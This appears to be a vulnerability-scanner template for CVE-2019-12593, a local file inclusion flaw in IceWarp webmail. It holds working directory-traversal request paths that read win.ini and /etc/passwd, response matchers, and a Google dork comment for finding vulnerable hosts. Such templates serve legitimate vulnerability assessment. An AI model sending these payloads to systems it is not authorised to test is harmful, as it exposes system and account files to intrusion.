26 lines
671 B
YAML
26 lines
671 B
YAML
|
id: CVE-2019-12593
|
||
|
|
||
|
info:
|
||
|
name: IIceWarp <=10.4.4 - Local File Inclusion
|
||
|
author: pikpikcu
|
||
|
severity: High
|
||
|
|
||
|
# reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593
|
||
|
# Google Doek:-Powered By IceWarp 10.4.4
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
|
||
|
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "[intl]"
|
||
|
- "root:x:0"
|